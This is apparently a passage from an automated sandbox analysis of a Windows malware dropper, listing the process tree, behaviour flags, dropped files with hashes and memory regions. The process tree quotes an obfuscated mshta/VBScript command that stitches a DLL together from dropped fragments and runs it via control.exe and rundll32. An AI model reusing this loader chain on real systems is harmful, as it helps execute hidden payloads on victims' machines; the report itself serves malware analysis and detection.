                      "C:\Windows\System32\mshta.exe" VBScRIPt: clOsE( cREATEObjEcT ( "wsCrIPT.SheLl"). rUN ( "C:\Windows\system32\cmd.exe /C EchO | sET /p = ""MZ"" > DGPfT4.kzH & COPY /Y /b DGPFT4.KzH+ 1_iQ.s + PBUQ78r.P + z27eOnF.4+ RMuPFPR.G ATVQG.K& STArT control .\aTVQG.K ", 0 , TrUE ) )
                      8⤵
                      • System Location Discovery: System Language Discovery
                      PID:2652
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\system32\cmd.exe" /C EchO | sET /p = "MZ" > DGPfT4.kzH & COPY /Y /b DGPFT4.KzH+ 1_iQ.s + PBUQ78r.P + z27eOnF.4+ RMuPFPR.G ATVQG.K& STArT control .\aTVQG.K
                        9⤵
                        • System Location Discovery: System Language Discovery
                        PID:1236
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" EchO "
                          10⤵
                          • System Location Discovery: System Language Discovery
                          PID:2612
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" sET /p = "MZ" 1>DGPfT4.kzH"
                          10⤵
                          • System Location Discovery: System Language Discovery
                          PID:2600
                        • C:\Windows\SysWOW64\control.exe
                          control .\aTVQG.K
                          10⤵
                          • System Location Discovery: System Language Discovery
                          PID:2360
                          • C:\Windows\SysWOW64\rundll32.exe
                            "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\aTVQG.K
                            11⤵
                            • System Location Discovery: System Language Discovery
                            PID:1644
                            • C:\Windows\system32\RunDll32.exe
                              C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\aTVQG.K
                              12⤵
                                PID:1708
                                • C:\Windows\SysWOW64\rundll32.exe
                                  "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\aTVQG.K
                                  13⤵
                                  • Blocklisted process makes network request
                                  • System Location Discovery: System Language Discovery
                                  PID:1736
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /f -im "Tue2042f82e3d3979159.exe"
                      7⤵
                      • System Location Discovery: System Language Discovery
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2812
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Tue20c64a1a28623ee7.exe
              3⤵
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:1412
              • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue20c64a1a28623ee7.exe
                Tue20c64a1a28623ee7.exe
                4⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:1916
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Tue2025487c6c276c3.exe
              3⤵
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:1920
              • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2025487c6c276c3.exe
                Tue2025487c6c276c3.exe
                4⤵
                • Executes dropped EXE
                PID:2580
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Tue20c0a313caa25872.exe
              3⤵
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:2844
              • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue20c0a313caa25872.exe
                Tue20c0a313caa25872.exe
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:1952
                • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue20c0a313caa25872.exe
                  "C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue20c0a313caa25872.exe" -u
                  5⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:1608
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Tue2066325c078.exe
              3⤵
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:2696
              • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2066325c078.exe
                Tue2066325c078.exe
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:2924
                • C:\Users\Admin\AppData\Local\Temp\is-VOKKE.tmp\Tue2066325c078.tmp
                  "C:\Users\Admin\AppData\Local\Temp\is-VOKKE.tmp\Tue2066325c078.tmp" /SL5="$601FC,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2066325c078.exe"
                  5⤵
                  • Executes dropped EXE
                  • Drops file in Program Files directory
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of FindShellTrayWindow
                  PID:3048
                  • C:\Program Files (x86)\Gparted\Build.sfx.exe
                    "C:\Program Files (x86)\Gparted\Build.sfx.exe" -p123 -s1
                    6⤵
                    • Executes dropped EXE
                    • Drops file in Program Files directory
                    • System Location Discovery: System Language Discovery
                    PID:656
                    • C:\Program Files (x86)\Gparted\Build.exe
                      "C:\Program Files (x86)\Gparted\Build.exe"
                      7⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2840
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
                        8⤵
                        • Drops file in Program Files directory
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2144
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.bing.com
                        8⤵
                        • Drops file in Program Files directory
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2604
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.yahoo.com
                        8⤵
                        • Drops file in Program Files directory
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:1720
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 2840 -s 1668
                        8⤵
                        • Program crash
                        PID:1352
                  • C:\Program Files (x86)\Gparted\gimagex.exe
                    "C:\Program Files (x86)\Gparted\gimagex.exe"
                    6⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:3032
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Tue20cceb49d9a7.exe /mixtwo
              3⤵
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:2904
              • C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue20cceb49d9a7.exe
                Tue20cceb49d9a7.exe /mixtwo
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:2256
        • C:\Windows\system32\makecab.exe
          "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241223201945.log C:\Windows\Logs\CBS\CbsPersist_20241223201945.cab
          1⤵
          • Drops file in Windows directory
          PID:2960
        • C:\Windows\system32\conhost.exe
          \??\C:\Windows\system32\conhost.exe "-1863419247-1674780506-18506447521187418775-8202501031456740231-780498702-1968327889"
          1⤵
          PID:2796
        • C:\Windows\system32\conhost.exe
          \??\C:\Windows\system32\conhost.exe "1649820664704882103-126041890817563162971037616523-2072930676148513689372817552"
          1⤵
          PID:2612
        • C:\Windows\system32\conhost.exe
          \??\C:\Windows\system32\conhost.exe "2759088361937918173540084650-1047105348-2015630080645382425-9975906451078920930"
          1⤵
          PID:2644

Network

MITRE ATT&CK Enterprise v15

Downloads

• C:\Program Files (x86)\Gparted\Build.exe
  Filesize: 113KB
  MD5: c874508845d1c0bb486f5e41af8de480
  SHA1: 3ac7e246934ba74c1018d50138bea77b035d6f90
  SHA256: 4793a9e954f00007a2f352648cddbc30add3ff4b7f22c3e1500d3671b0eb36be
  SHA512: 80daa52fea184748c4b858af4c7a676dddddf4c3cfdfada44917abddb0495ab22a9728800ea7f408fb3e66c269eda9df2462a9f82cf6a57c254d6c233c46f758

• C:\Program Files (x86)\Gparted\gimagex.exe
  Filesize: 263KB
  MD5: 85199ea4a530756b743ad4491ea84a44
  SHA1: 0842cd749986d65d400a9605d17d2ed7a59c13cc
  SHA256: 3ea24d7899169c28d505233e13b9c92b51cd1181be299487392700d29e13b9aa
  SHA512: b82b1c0ba24fa3e4c1f5309eee4cc6be0dfcc20f64886a40e4eb35d804f36af864b3e4218d7f27f439fa45659af0d69410798c9b3d1e5cab5a259759b7ad1f99

• C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2025487c6c276c3.exe
  Filesize: 1.4MB
  MD5: 18b59e79ac40c081b719c1b8d6c6cf32
  SHA1: ec01215c5e5eac7149a0777a98d15575df29676c
  SHA256: 7a0fb647c62e46b48095bb37e4a4750288ad5d062f34121769acd94cb864a478
  SHA512: b491a781b3346eed93ebfe3c7247ef46cdf53a2e6ead6d800c229d4a65cc2a641f15b509560bf58e7f604b1f280159c95787084b8a8defd849ed7d5e4ce2dab2

• C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue202def121e32deb35.exe
  Filesize: 294KB
  MD5: 5d30047ee5db838529168e7a970d98e2
  SHA1: 864e94db65e6c1c52e063184d2da2b07a3be4a41
  SHA256: c6cf65fa806ea759cd9141c844815ad45ac6e6b03cb4aa50b2bd8963b19ef161
  SHA512: 88ad9bf1f5ab4dfed6bb3c581df4576841e5bb03cfc8700b6331b49058d39a8a5edc9d9e5efb4ad2b5fbe656de143fd0ee1a27655e3aefb8f0247a96cfecbbd3

• C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2042f82e3d3979159.exe
  Filesize: 1.7MB
  MD5: 8ddac734c2d77bab23f64e46daf14825
  SHA1: 0676db42d4beaf136a86959e25aa7ec0108da1a5
  SHA256: e9eaff773b37f538b1b8b41a568d045cb510edbf221fead512d765d7df0f9e3a
  SHA512: ff9f9d9046292e5ba9bd7e4e8433f8d922d839c2d6b007f41a8c81bf3bc0f1980c296870d3dfcce27261589b9d0d6a9b94453055c501d7d759cd04f96d0040c1

• C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue205ff5cb98.exe
  Filesize: 126KB
  MD5: cd6d011a663a12f81ba8e4e5407e3a6f
  SHA1: 53c81876f0ff422d41f19c6d2ea0d30548e4e071
  SHA256: c303cb56a1c37e081b25cfec6b61829205cdd473deafed698bf725ca55a5b7a1
  SHA512: 8b3228f725a3f49ab34bd36f09589ce682d1115acd212f9b6818708d59b263d9b83ec8e475f917df349449d5126a06ac1a55063f2946842639c0194412482738

• C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2066325c078.exe
  Filesize: 1.9MB
  MD5: b84f79adfccd86a27b99918413bb54ba
  SHA1: 06a61ab105da65f78aacdd996801c92d5340b6ca
  SHA256: 6913b6cc93ab1fb509ab7459d6158be6f1b03ab06d2ed41782b86838bd504c49
  SHA512: 99139ce83106810b213e1d89a2d017e824859a48784c9b04adf08314eeacc20b8b22e64349f4609eaf8d47b8a3c35b0fb3b4a270c29f090d2e4d3e3ca3455f38

• C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2069ccb821.exe
  Filesize: 625KB
  MD5: 4f11e641d16d9590ac1c9f70d215050a
  SHA1: 75688f56c970cd55876f445c8319d7b91ce556fb
  SHA256: efbf94261833d1318a16120c706a80c4853697ce85ffa714e7f5afca1d19e1c0
  SHA512: b7358554587bce2ffe5cf5ac7ea6d590b810db2def56369010a7f10eacc89dd9d4c4c42b5bf113372a146d3a3cc55a1f21f269deadec5d483f51236318404007

• C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue207aa8a73892eeac.exe
  Filesize: 1.4MB
  MD5: 8268aa1cba3763a79c3dd333ab42c093
  SHA1: e7d034e6f55bc07b38ad50f5bb2e83f098c60c97
  SHA256: 7f6eef3d7d271decfd078c27b125d8c06dcd3a920f0e9edf8edf229ee1b2012f
  SHA512: 271797ad106169e7bbed9b70187d8b643ed7d164b7ed0049d3656334899ccb1bd19e4a4ec2fab9d5f00cad718a5248cf78ac976d9c032665d6758a2f8dd91195

• C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue20c64a1a28623ee7.exe
  Filesize: 8KB
  MD5: 3476b903e6e6ff5f246460e8749fd232
  SHA1: 3639e6c1f104ad7aa24ab7f72aca5dad686361cf
  SHA256: 25cbf20f43b95afac49543b0dd5378626ab2c78f5edadd781441b335f9fc1002
  SHA512: ac99a88b90e1396b2a8db98e56eb350ad95a8f8faa5b7b36862f603899aa9a8bd2a69d5abf3346158c6605f3475b4ab3366c644c7ab23dd5e436cc8951d0e026

• C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue20cb62eb1a4cb3a01.exe
  Filesize: 4.3MB
  MD5: f283ac3ee21ba25e7a192dd89380ec45
  SHA1: 2b286463a55ccec186a2ab17d9d3ee032925eb9f
  SHA256: 1ad65db0dc93eff742bafe3ba4cbd996d0821280be35c44056d38963408f7da2
  SHA512: df0207c68772378b7271f8ee55a4a0fa8146c04e1eb1d58cfb917b3b34d11ceb6725c4f38afffffe300190a05e0ffa19bd9d0a4c1170d7214111d2aebee5409e

• C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\libcurl.dll
  Filesize: 218KB
  MD5: d09be1f47fd6b827c81a4812b4f7296f
  SHA1: 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
  SHA256: 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
  SHA512: 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

• C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\libcurlpp.dll
  Filesize: 54KB
  MD5: e6e578373c2e416289a8da55f1dc5e8e
  SHA1: b601a229b66ec3d19c2369b36216c6f6eb1c063e
  SHA256: 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
  SHA512: 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

• C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\libstdc++-6.dll
  Filesize: 647KB
  MD5: 5e279950775baae5fea04d2cc4526bcc
  SHA1: 8aef1e10031c3629512c43dd8b0b5d9060878453
  SHA256: 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
  SHA512: 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

• C:\Users\Admin\AppData\Local\Temp\7zSC31EE1A6\libwinpthread-1.dll
  Filesize: 69KB
  MD5: 1e0d62c34ff2e649ebc5c372065732ee
  SHA1: fcfaa36ba456159b26140a43e80fbd7e9d9af2de
  SHA256: 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
  SHA512: 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

• C:\Users\Admin\AppData\Local\Temp\Cab7520.tmp
  Filesize: 70KB
  MD5: 49aebf8cbd62d92ac215b2923fb1b9f5
  SHA1: 1723be06719828dda65ad804298d0431f6aff976
  SHA256: b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
  SHA512: bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

• C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
  Filesize: 8.3MB
  MD5: fd2727132edd0b59fa33733daa11d9ef
  SHA1: 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
  SHA256: 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
  SHA512: 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

• C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
  Filesize: 492KB
  MD5: fafbf2197151d5ce947872a4b0bcbe16
  SHA1: a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020
  SHA256: feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71
  SHA512: acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6

• C:\Users\Admin\AppData\Local\Temp\Tar7688.tmp
  Filesize: 181KB
  MD5: 4ea6026cf93ec6338144661bf1202cd1
  SHA1: a1dec9044f750ad887935a01430bf49322fbdcb7
  SHA256: 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
  SHA512: 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

• C:\Users\Admin\AppData\Local\Temp\is-6CLTF.tmp\Tue2032d2e78e3d4a56.tmp
  Filesize: 691KB
  MD5: 9303156631ee2436db23827e27337be4
  SHA1: 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
  SHA256: bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
  SHA512: 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

• C:\Users\Admin\AppData\Local\Temp\is-9PEME.tmp\idp.dll
  Filesize: 216KB
  MD5: b37377d34c8262a90ff95a9a92b65ed8
  SHA1: faeef415bd0bc2a08cf9fe1e987007bf28e7218d
  SHA256: e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
  SHA512: 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

• C:\Users\Admin\AppData\Local\Temp\is-D1KEV.tmp\_isetup\_shfoldr.dll
  Filesize: 22KB
  MD5: 92dc6ef532fbb4a5c3201469a5b5eb63
  SHA1: 3e89ff837147c16b4e41c30d6c796374e0b8e62c
  SHA256: 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
  SHA512: 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

• C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
  Filesize: 5.3MB
  MD5: 1afff8d5352aecef2ecd47ffa02d7f7d
  SHA1: 8b115b84efdb3a1b87f750d35822b2609e665bef
  SHA256: c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
  SHA512: e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

• C:\Users\Admin\AppData\Local\Temp\osloader.exe
  Filesize: 591KB
  MD5: e2f68dc7fbd6e0bf031ca3809a739346
  SHA1: 9c35494898e65c8a62887f28e04c0359ab6f63f5
  SHA256: b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
  SHA512: 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

• C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6R3EL41SV3PU2SIKYX5J.temp
  Filesize: 7KB
  MD5: 588876a1826ca18cbeab664e44acf097
  SHA1: 985e39f299a60ea0677713be989681b1f42af86a
  SHA256: bce14f12579bde6b0c24fa00c4db5a18c8b488e87dd7997bdfa455765f963737
  SHA512: e8e5e83d880d6b4737d219b62b48c2579a32f817d28ce62cb6ba00657d7dc265b20b8abf9cef79843ed18396aa4b1a98ba38835fa2dd8d36d668e59596b82b02

• C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BX0B3BO78UWBPAYAHYZE.temp
  Filesize: 7KB
  MD5: 03378af97f81c93b59b3277482552239
  SHA1: 4d49804ce24ad7bafab2871ea21d6cb0b38b1d5f
  SHA256: 91c8218c5a306f1bf4ff4521db6f90071387bed74c00ae31b02b83034d5fe24e
  SHA512: 67936173a19804a8c37f8ff01837b4117c4509537dc4970dfa8f49a3265e75bac6aff1315728fd36c134ad11e6bdbbaf3453a4cfcd54c0a043118093c8417ebb

• \Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue20177cabec2a.exe
  Filesize: 383KB
  MD5: 5eec35ae4619a7992130f13f66b03002
  SHA1: 47141ead2a1166234970c3dba5821cee57ddbb4d
  SHA256: 947efb32f120d30758ff6801dd1118922cff317411e87906aa9153fe928b1156
  SHA512: 5f8ae8110b7aa626cf1002f1f214ccc2fd09956cb9d2d82d31115adee356ffd529d1eef4f32a2f193fd862029f930ad01f068b22335d61a00ae5b25106c0590a

• \Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2032d2e78e3d4a56.exe
  Filesize: 379KB
  MD5: 314e3dc1f42fb9d858d3db84deac9343
  SHA1: dec9f05c3bcc759b76f4109eb369db9c9666834b
  SHA256: 79133c9e1cdfdfada9bc3d49ba30d872c91383eb7515302cd7bd2e1c5b983b08
  SHA512: 23f6c8f785c6d59d976d437732d1ea5968403239c5f8c3ca83983d1a0b3d9f8426803b7de7c2e819d16a1fb35f9e24461593fdcc75cd81ddc0076c22ed1e45f2

• \Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue2089e53e7fc7158da.exe
  Filesize: 393KB
  MD5: d467d372ca2ff1c8dcad54da399c09d9
  SHA1: 79d9769742dc9f52c7623a96aea6560284ee2345
  SHA256: bcf196a4c0a3c6b1fe697f30c6b33c8215701f2c98deec8e09530c622758b799
  SHA512: 6df383fcc8c3db9f30f78b8f5b0d0bf12097f5807c5b22d4f115137386684a6f0b7ab9c7c4425ddb3ef1146bdfc300a797e4df41632b50acbb620a0f53dfc8f4

• \Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue20acc89cbd449e95d.exe
  Filesize: 391KB
  MD5: c7cd0def6982f7b281c6a61d29eec4be
  SHA1: f9f600d70d60cf79563e84cec0b883fa3f541690
  SHA256: b2525fcbe771148a6c9b9db5786b8ab833391684eb1ac6152e0a311b2a7f3ab9
  SHA512: 370c2bde411f188575177ca0821e5920496220785a6aac2e40b2a8d4a0f3151b5bca5e6e90688ba02780bbe1ea0bc1894588b10ff24e2c510254e38c0355b13b

• \Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue20c0a313caa25872.exe
  Filesize: 76KB
  MD5: 99471e8043cb5f141962e1cfe12d44f4
  SHA1: 57c6baf415f892dfa82c206c1380a34130dad19d
  SHA256: 1946616cacfd8688bb722a2b1a6a0df117f9d8d877c675704602c2e8301dd509
  SHA512: a31de569cf29efa20fad89a43ac55e6f93562d2204158d1d48f4c05f047fc59a6869a90a42184442e88d3b0d611e74c82d420eaccf9cfa08c6d4227c568baf41

• \Users\Admin\AppData\Local\Temp\7zSC31EE1A6\Tue20cceb49d9a7.exe
  Filesize: 1.2MB
  MD5: 22c90797f0fcd5308ce9454001263d8d
  SHA1: 1dec527d6f33e583e66459a9f646049bf8bb63b1
  SHA256: ef13f310e3e72a96feecc6768f5997e5b89651bf56b1958bebcfafb33f0fb036
  SHA512: 37bd42020137134f67e16d2abe9fcbd34d2d9e9dacb914747f67d4add7913f95b3fa6afcb4a93ea68443efecd041c13300a830d06fd2b165ddc69b2c3dd41fbd

• \Users\Admin\AppData\Local\Temp\7zSC31EE1A6\libgcc_s_dw2-1.dll
  Filesize: 113KB
  MD5: 9aec524b616618b0d3d00b27b6f51da1
  SHA1: 64264300801a353db324d11738ffed876550e1d3
  SHA256: 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
  SHA512: 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

• \Users\Admin\AppData\Local\Temp\7zSC31EE1A6\setup_install.exe
  Filesize: 2.1MB
  MD5: 4a7048fc29b517ffb9f9248a26ac4e84
  SHA1: 308a90114387616d0c7f9e1b8fee1d6010ecc0c9
  SHA256: 368c4fac65894b3a3f277403f81253ed0cfef73645ef61e5915410496cce7021
  SHA512: f85ebfff6928891c29b137eef65daaa9f1728f88d25226f171e13152cedfbcf280b9dad00b8bfd29a418ef20eecc157b305c31538ad457465bb024c4cba8bf81

• memory/320-165-0x0000000000400000-0x00000000004BD000-memory.dmp
  Filesize: 756KB

• memory/408-178-0x00000000044A0000-0x00000000048AF000-memory.dmp
  Filesize: 4.1MB

• memory/408-245-0x0000000000400000-0x00000000023CF000-memory.dmp
  Filesize: 31.8MB

• memory/832-360-0x0000000140000000-0x00000001405E8000-memory.dmp
  Filesize: 5.9MB

• memory/832-369-0x0000000140000000-0x00000001405E8000-memory.dmp
  Filesize: 5.9MB

• memory/1156-161-0x0000000000E20000-0x0000000000E88000-memory.dmp
  Filesize: 416KB

• memory/1540-241-0x0000000000400000-0x0000000001FCF000-memory.dmp
  Filesize: 27.8MB

• memory/1644-213-0x0000000002FE0000-0x000000000307A000-memory.dmp
  Filesize: 616KB

• memory/1644-212-0x00000000008B0000-0x000000000095E000-memory.dmp
  Filesize: 696KB

• memory/1644-130-0x0000000000400000-0x0000000000414000-memory.dmp
  Filesize: 80KB

• memory/1644-211-0x00000000028C0000-0x0000000002B0A000-memory.dmp
  Filesize: 2.3MB

• memory/1644-173-0x0000000000400000-0x0000000000414000-memory.dmp
  Filesize: 80KB

• memory/1644-216-0x0000000002FE0000-0x000000000307A000-memory.dmp
  Filesize: 616KB

• memory/1916-192-0x0000000000FB0000-0x0000000000FB8000-memory.dmp
  Filesize: 32KB

• memory/2036-258-0x0000000000400000-0x00000000004BD000-memory.dmp
  Filesize: 756KB

• memory/2144-162-0x0000000001130000-0x0000000001198000-memory.dmp
  Filesize: 416KB

• memory/2328-166-0x0000000000400000-0x0000000000414000-memory.dmp
  Filesize: 80KB

• memory/2328-246-0x0000000000400000-0x0000000000414000-memory.dmp
  Filesize: 80KB

• memory/2556-244-0x0000000000400000-0x00000000004BD000-memory.dmp
  Filesize: 756KB

• memory/2656-242-0x0000000000400000-0x0000000000414000-memory.dmp
  Filesize: 80KB

• memory/2656-135-0x0000000000400000-0x0000000000414000-memory.dmp
  Filesize: 80KB

• memory/2724-217-0x0000000000400000-0x0000000000420000-memory.dmp
  Filesize: 128KB

• memory/2724-226-0x0000000000400000-0x0000000000420000-memory.dmp
  Filesize: 128KB

• memory/2724-227-0x0000000000400000-0x0000000000420000-memory.dmp
  Filesize: 128KB

• memory/2724-228-0x0000000000400000-0x0000000000420000-memory.dmp
  Filesize: 128KB

• memory/2724-225-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
  Filesize: 4KB

• memory/2724-223-0x0000000000400000-0x0000000000420000-memory.dmp
  Filesize: 128KB

• memory/2724-219-0x0000000000400000-0x0000000000420000-memory.dmp
  Filesize: 128KB

• memory/2724-221-0x0000000000400000-0x0000000000420000-memory.dmp
  Filesize: 128KB

• memory/2744-235-0x0000000000400000-0x0000000000420000-memory.dmp
  Filesize: 128KB

• memory/2744-238-0x0000000000400000-0x0000000000420000-memory.dmp
  Filesize: 128KB

• memory/2744-231-0x0000000000400000-0x0000000000420000-memory.dmp
  Filesize: 128KB

• memory/2744-233-0x0000000000400000-0x0000000000420000-memory.dmp
  Filesize: 128KB

• memory/2744-237-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
  Filesize: 4KB

• memory/2744-240-0x0000000000400000-0x0000000000420000-memory.dmp
  Filesize: 128KB

• memory/2744-239-0x0000000000400000-0x0000000000420000-memory.dmp
  Filesize: 128KB

• memory/2752-100-0x000000006EB40000-0x000000006EB63000-memory.dmp
  Filesize: 140KB

• memory/2752-76-0x000000006B280000-0x000000006B2A6000-memory.dmp
  Filesize: 152KB

• memory/2752-71-0x000000006B440000-0x000000006B4CF000-memory.dmp
  Filesize: 572KB

• memory/2752-62-0x000000006B440000-0x000000006B4CF000-memory.dmp
  Filesize: 572KB

• memory/2752-58-0x000000006B280000-0x000000006B2A6000-memory.dmp
  Filesize: 152KB

• memory/2752-96-0x0000000000400000-0x000000000051C000-memory.dmp
  Filesize: 1.1MB

• memory/2752-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp
  Filesize: 1.5MB

• memory/2752-101-0x000000006FE40000-0x000000006FFC6000-memory.dmp
  Filesize: 1.5MB

• memory/2752-102-0x000000006B280000-0x000000006B2A6000-memory.dmp
  Filesize: 152KB

• memory/2752-75-0x000000006FE40000-0x000000006FFC6000-memory.dmp
  Filesize: 1.5MB

• memory/2752-103-0x000000006B440000-0x000000006B4CF000-memory.dmp
